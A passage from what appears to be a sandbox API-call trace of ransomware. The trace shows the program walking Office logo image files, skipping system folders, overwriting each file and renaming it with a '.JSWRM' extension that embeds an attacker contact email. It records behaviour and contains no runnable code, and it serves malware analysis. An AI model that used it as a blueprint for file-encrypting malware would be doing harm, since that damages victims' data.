office\\root\\office16\\logoimages\\outlooklogo.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.520] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9bd, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogo.contrast-white_scale-100.png", cAlternateFileName="OUTLOO~3.PNG")) returned 1 [0133.520] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-100.png", lpString2=".") returned 1 [0133.520] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-100.png", lpString2="..") returned 1 [0133.520] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-100.png", lpString2="...") returned 1 [0133.520] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-100.png", lpString2="windows") returned -1 [0133.520] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0133.520] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0133.520] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0133.520] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.520] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0133.520] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0133.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0133.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22ce70, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0133.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.521] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2493) returned 1 [0133.521] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.521] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9b0, lpOverlapped=0x0) returned 1 [0133.523] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.523] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9b0, lpOverlapped=0x0) returned 1 [0133.523] CloseHandle (hObject=0x238) returned 1 [0133.523] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.524] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd9a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogo.contrast-white_scale-140.png", cAlternateFileName="OUTLOO~2.PNG")) returned 1 [0133.524] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-140.png", lpString2=".") returned 1 [0133.524] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-140.png", lpString2="..") returned 1 [0133.525] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-140.png", lpString2="...") returned 1 [0133.525] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-140.png", lpString2="windows") returned -1 [0133.525] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0133.525] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0133.525] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0133.525] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.525] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0133.525] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0133.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0133.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0133.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.526] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3482) returned 1 [0133.526] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.526] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd90, lpOverlapped=0x0) returned 1 [0133.528] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.528] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd90, lpOverlapped=0x0) returned 1 [0133.528] CloseHandle (hObject=0x238) returned 1 [0133.528] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.529] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10ea, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogo.contrast-white_scale-180.png", cAlternateFileName="OUC015~1.PNG")) returned 1 [0133.529] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-180.png", lpString2=".") returned 1 [0133.529] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-180.png", lpString2="..") returned 1 [0133.529] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-180.png", lpString2="...") returned 1 [0133.529] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-180.png", lpString2="windows") returned -1 [0133.529] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0133.529] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0133.529] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0133.530] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.530] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0133.530] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0133.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0133.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0133.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.531] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4330) returned 1 [0133.531] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.531] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x10e0, lpOverlapped=0x0) returned 1 [0133.533] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.533] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x10e0, lpOverlapped=0x0) returned 1 [0133.533] CloseHandle (hObject=0x238) returned 1 [0133.533] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.534] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b250ebf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b250ebf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b250ebf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8ac, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogo.contrast-white_scale-80.png", cAlternateFileName="OU197C~1.PNG")) returned 1 [0133.534] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-80.png", lpString2=".") returned 1 [0133.534] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-80.png", lpString2="..") returned 1 [0133.534] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-80.png", lpString2="...") returned 1 [0133.534] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-80.png", lpString2="windows") returned -1 [0133.534] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0133.534] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0133.534] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0133.534] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.534] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0133.534] lstrcmpiW (lpString1="OutlookLogo.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0133.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0133.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0133.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0133.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0133.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.536] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2220) returned 1 [0133.536] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.536] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8a0, lpOverlapped=0x0) returned 1 [0133.538] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.538] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8a0, lpOverlapped=0x0) returned 1 [0133.538] CloseHandle (hObject=0x238) returned 1 [0133.538] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.539] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa86, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogo.scale-100.png", cAlternateFileName="OUBE28~1.PNG")) returned 1 [0133.539] lstrcmpiW (lpString1="OutlookLogo.scale-100.png", lpString2=".") returned 1 [0133.539] lstrcmpiW (lpString1="OutlookLogo.scale-100.png", lpString2="..") returned 1 [0133.539] lstrcmpiW (lpString1="OutlookLogo.scale-100.png", lpString2="...") returned 1 [0133.539] lstrcmpiW (lpString1="OutlookLogo.scale-100.png", lpString2="windows") returned -1 [0133.539] lstrcmpiW (lpString1="OutlookLogo.scale-100.png", lpString2="recovery") returned -1 [0133.539] lstrcmpiW (lpString1="OutlookLogo.scale-100.png", lpString2="perflogs") returned -1 [0133.539] lstrcmpiW (lpString1="OutlookLogo.scale-100.png", lpString2="documents and settings") returned 1 [0133.539] lstrcmpiW (lpString1="OutlookLogo.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.539] lstrcmpiW (lpString1="OutlookLogo.scale-100.png", lpString2="system volume information") returned -1 [0133.539] lstrcmpiW (lpString1="OutlookLogo.scale-100.png", lpString2="msocache") returned 1 [0133.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x2411f0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 25 [0133.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x2412b8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 25 [0133.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.540] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2694) returned 1 [0133.540] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.540] ReadFile (in: hFile=0x238, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa80, lpOverlapped=0x0) returned 1 [0133.542] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.542] WriteFile (in: hFile=0x238, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa80, lpOverlapped=0x0) returned 1 [0133.542] CloseHandle (hObject=0x238) returned 1 [0133.542] MoveFileW 